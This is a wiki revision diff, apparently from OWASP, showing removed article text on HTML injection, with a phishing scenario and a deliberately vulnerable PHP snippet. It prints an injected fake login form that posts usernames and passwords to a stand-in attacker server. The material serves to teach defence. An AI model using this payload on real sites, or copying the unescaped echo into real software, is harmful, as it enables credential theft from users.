Difference between revisions of "HTML Injection"

Jump to: navigation, search
(Blanked the page)
Line 1: Line 1:
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''
Hypertext Markup Language (HTML) injection, also sometimes referred to as ''virtual defacement'', is an attack on a user made possible by an injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply valid HTML, typically via a parameter value, and inject their own content into the page.<br>
This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
== HTML Injection vs. Cross-site Scripting<br> ==
HTML injection is an attack that is closely related to [[Cross-site Scripting (XSS)]]. The difference is not in the vulnerability, but in the type of attack that leverages the vulnerability. While XSS uses script tags to run JavaScript, HTML injection simply uses HTML to modify the page for malicious reasons.
==Risk Factors==
===Attack Example===
A possible attack scenario is demonstrated below:
# Attacker discovers injection vulnerability and decides to use an HTML injection attack
# Attacker crafts malicious link, including his injected HTML content, and sends it to a user via email
# The user visits the page due to the page being located within a trusted domain
# The attacker's injected HTML is rendered and presented to the user asking for a username and password
# The user enters a username and password, which are both sent to the attackers server
: A simple PHP page containing an injection vulnerability via the ''name'' parameter:
    $name = $_REQUEST ['name'];
<h1>Welcome to the Internet!</h1>
            Hello, <?php echo $name; ?>!
    <p>We are so glad you are here!</p>
The page functionality can be tested by making the following GET request to the page:
By requesting the link below, the page renders the injected HTML, presents a login form, and comments out the rest of the page after the injection point. Once a user enters their username and password, the values are sent to a page named ''login.php'' on the attacker's server via POST.
<pre><h3>Please Enter Your Username and Password to Proceed:</h3><form method="POST"
action="http://attackerserver/login.php">Username: <input type="text" name="username" /><br />Password: <input type="password"
name="password" /><br /><input type="submit" value="Login" /></form><!--
==Related [[Threat Agents]]==
* [[Threat Agent 1]]
* [[Threat Agent 2]]
==Related [[Attacks]]==
* [[Cross-site Scripting (XSS)]]
* [[:Category:Injection Attack]]
==Related [[Vulnerabilities]]==
* [[:Category:Input Validation Vulnerability]]
* [[Improper Data Validation]]
==Related [[Controls]]==
* [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]
* CERT Advisory on Malicious HTML Tags: http://www.cert.org/advisories/CA-2000-02.html
* OWASP's [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]
* OWASP Guide to Building Secure Web Applications and Web Services, Chapter 8: [[Data_Validation|Data Validation]]
* HTML Code Injection and Cross-site Scripting: http://www.technicalinfo.net/papers/CSS.html

Revision as of 15:35, 3 January 2013